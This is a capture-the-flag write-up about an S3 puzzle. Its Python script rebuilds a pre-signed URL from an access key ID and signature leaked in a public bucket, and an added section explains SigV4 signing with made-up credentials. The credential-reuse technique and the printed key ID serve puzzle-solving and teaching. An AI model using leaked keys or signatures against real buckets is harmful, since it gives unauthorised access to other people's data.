We get a letter:
Hey Fellow Coworker,
Heard you were coming into the Sacramento office today. I have some sensitive information for you to read out about company stored at ad586b62e3b5921bd86fe2efa4919208 once you are settled in. Make sure you're a valid user!
Don't read it all yet since they might be watching. Be sure to read it once you are back in Columbus.
Act quickly! All of this stuff will disappear a week from 19:53:23 on September 9th 2020.
- Totally Loyal Coworker
The first step is to find out what the mysterious hex string is. The task contains many hints about cloud services, and says that something is stored at this location, so I'm thinking S3 buckets or something similar. We quickly found the S3 bucket ad586b62e3b5921bd86fe2efa4919208 on amazonaws; listing the files in it requires a valid account. It consists of many folders with random names, but one file contains an AWS access key ID, another a secret string, and a third a folder path. The last interesting file contains a SHA-256 HMAC signature:
With all of these values we can craft a pre-signed url to access the new bucket. Let's try to access
in this bucket.
I crafted the URL using the following script. The date used is the date mentioned in the letter, and the expiry time is set to one week.
import datetime
import hashlib
import logging
import urllib.parse

import requests

logger = logging.getLogger(__name__)


def generate_presigned_s3_get(bucket, object_key, region, expires_in, access_key, signature):
    METHOD = 'GET'
    SERVICE = 's3'
    ENCODING = 'utf8'

    host = bucket + '.s3.' + region + '.amazonaws.com'
    endpoint = 'https://' + host

    # Timestamp from the letter: 19:53:23 on September 9th 2020.
    t = datetime.datetime(2020, 9, 9, 19, 53, 23)
    amz_date = t.strftime('%Y%m%dT%H%M%SZ')
    datestamp = t.strftime('%Y%m%d')

    canonical_uri = '/' + object_key
    canonical_headers = 'host:' + host + '\n'
    signed_headers = 'host'

    algorithm = 'AWS4-HMAC-SHA256'
    credential_scope = datestamp + '/' + region + '/' + SERVICE + '/' + 'aws4_request'

    canonical_querystring = '?X-Amz-Algorithm=AWS4-HMAC-SHA256'
    canonical_querystring += '&X-Amz-Credential=' + urllib.parse.quote_plus(access_key + '/' + credential_scope)
    canonical_querystring += '&X-Amz-Date=' + amz_date
    canonical_querystring += '&X-Amz-Expires=' + str(expires_in)
    canonical_querystring += '&X-Amz-SignedHeaders=' + signed_headers

    # Not used below: the signature was found in the first bucket, so nothing is signed here.
    canonical_request = METHOD + '\n' + canonical_uri + '\n' + canonical_querystring[1:] + '\n' + canonical_headers + '\n' + signed_headers + '\nUNSIGNED-PAYLOAD'
    string_to_sign = algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' + hashlib.sha256(canonical_request.encode(ENCODING)).hexdigest()

    canonical_querystring += '&X-Amz-Signature=' + signature
    url = endpoint + canonical_uri + canonical_querystring
    logger.info('presigned url: %s' % url)
    return url


BUCKET = 'super-top-secret-dont-look'
REGION = 'us-east-2'
CREDS = 'AKIAQHTF3NZUTQBCUQCK'
EXPIRES = 604800  # one week, in seconds
SIGNATURE = '3560cef4b02815e7c5f95f1351c1146c8eeeb7ae0aff0adc5c106f6488db5b6b'

url = generate_presigned_s3_get(BUCKET, '.sorry/.for/.nothing/flag.txt', REGION, EXPIRES, CREDS, SIGNATURE)
r = requests.get(url)
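The script has to reuse the letter's exact timestamp and the one-week expiry because a SigV4 query-string signature covers the method, host, object path, credential scope, date and expiry, so a leaked signature is a bearer token for exactly one request shape until it expires. The sketch below is an added example, not part of the original writeup: the secret key and access key ID are constructed placeholders, and `presign_signature` and `sig` are hypothetical helper names.

```python
import datetime
import hashlib
import hmac
from urllib.parse import quote


def _mac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()


def presign_signature(secret, access_key, bucket, region, object_key, when, expires_in):
    """SigV4 query-string signature for GET /object_key (only 'host' signed)."""
    host = f"{bucket}.s3.{region}.amazonaws.com"
    amz_date = when.strftime("%Y%m%dT%H%M%SZ")
    datestamp = when.strftime("%Y%m%d")
    scope = f"{datestamp}/{region}/s3/aws4_request"
    params = {
        "X-Amz-Algorithm": "AWS4-HMAC-SHA256",
        "X-Amz-Credential": f"{access_key}/{scope}",
        "X-Amz-Date": amz_date,
        "X-Amz-Expires": str(expires_in),
        "X-Amz-SignedHeaders": "host",
    }
    # Canonical query string: parameters sorted by name, values URI-encoded.
    query = "&".join(f"{k}={quote(v, safe='')}" for k, v in sorted(params.items()))
    canonical_request = "\n".join(
        ["GET", "/" + quote(object_key), query, f"host:{host}\n", "host", "UNSIGNED-PAYLOAD"])
    string_to_sign = "\n".join(
        ["AWS4-HMAC-SHA256", amz_date, scope,
         hashlib.sha256(canonical_request.encode("utf-8")).hexdigest()])
    # The signing key is derived from the secret and scoped to date/region/service.
    key = ("AWS4" + secret).encode("utf-8")
    for part in (datestamp, region, "s3", "aws4_request"):
        key = _mac(key, part)
    return _mac(key, string_to_sign).hex()


# Constructed credentials; bucket, region, path and timestamp are the page's.
SECRET, ACCESS_KEY = "constructed-secret-not-a-real-key", "AKIAEXAMPLEEXAMPLE00"
ARGS = ("super-top-secret-dont-look", "us-east-2", ".sorry/.for/.nothing/flag.txt")
ISSUED = datetime.datetime(2020, 9, 9, 19, 53, 23)


def sig(when=ISSUED, expires_in=604800, key=ARGS[2]):
    return presign_signature(SECRET, ACCESS_KEY, ARGS[0], ARGS[1], key, when, expires_in)


if __name__ == "__main__":
    print("as issued      ", sig())
    print("one second late", sig(when=ISSUED + datetime.timedelta(seconds=1)))
    print("shorter expiry ", sig(expires_in=3600))
    print("other object   ", sig(key="other.txt"))
```

Every variation prints a different signature, which is why files holding a signature next to its access key ID and path should be treated as live credentials until the `X-Amz-Expires` window has passed.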